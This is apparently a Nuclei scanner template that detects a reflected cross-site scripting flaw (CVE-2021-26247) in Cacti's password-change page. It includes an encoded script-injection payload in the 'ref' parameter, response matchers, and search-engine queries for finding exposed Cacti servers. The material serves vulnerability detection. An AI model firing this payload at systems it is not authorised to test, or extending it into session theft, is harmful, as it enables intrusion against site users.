54 lines
2.0 KiB
YAML
54 lines
2.0 KiB
YAML
id: CVE-2021-26247
|
|
|
|
info:
|
|
name: Cacti - Cross-Site Scripting
|
|
author: dhiyaneshDK
|
|
severity: medium
|
|
description: Cacti contains a cross-site scripting vulnerability via "http://<CACTI_SERVER>/auth_changepassword.php?ref=<script>alert(1)</script>" which can successfully execute the JavaScript payload present in the "ref" URL parameter.
|
|
impact: |
|
|
Successful exploitation of this vulnerability could allow an attacker to execute arbitrary JavaScript code in the context of the victim's browser, leading to session hijacking, defacement, or theft of sensitive information.
|
|
remediation: |
|
|
Apply the latest security patches or upgrade to a patched version of Cacti to mitigate this vulnerability.
|
|
reference:
|
|
- https://www.cacti.net/info/changelog
|
|
- https://nvd.nist.gov/vuln/detail/CVE-2021-26247
|
|
- https://github.com/ARPSyndicate/cvemon
|
|
- https://github.com/ARPSyndicate/kenzer-templates
|
|
classification:
|
|
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
|
|
cvss-score: 6.1
|
|
cve-id: CVE-2021-26247
|
|
cwe-id: CWE-79
|
|
epss-score: 0.00255
|
|
epss-percentile: 0.65308
|
|
cpe: cpe:2.3:a:cacti:cacti:0.8.7g:*:*:*:*:*:*:*
|
|
metadata:
|
|
max-request: 1
|
|
vendor: cacti
|
|
product: cacti
|
|
fofa-query: icon_hash="-1797138069"
|
|
shodan-query: http.title:"login to cacti"
|
|
google-query: intitle:"cacti"
|
|
tags: cve,cve2021,cacti,xss
|
|
|
|
http:
|
|
- method: GET
|
|
path:
|
|
- '{{BaseURL}}/auth_changepassword.php?ref=%22%3E%3C%2Fscript%3E%3Cscript%3Ealert(document.domain)%3C%2Fscript%3E'
|
|
|
|
matchers-condition: and
|
|
matchers:
|
|
- type: word
|
|
part: body
|
|
words:
|
|
- '"></script><script>alert(document.domain)</script>'
|
|
|
|
- type: word
|
|
part: header
|
|
words:
|
|
- "text/html"
|
|
|
|
- type: status
|
|
status:
|
|
- 200
|
|
# digest: 490a00463044022060906f5a13e7c9a79ec2f3046802a8847f412fde4539fe308415d82de26ec2880220648670c021a3d7303ba5f0f58d215957aa04ef13aea6d528f7081ae2a2baf80f:922c64590222798bb761d5b6d8e72950 |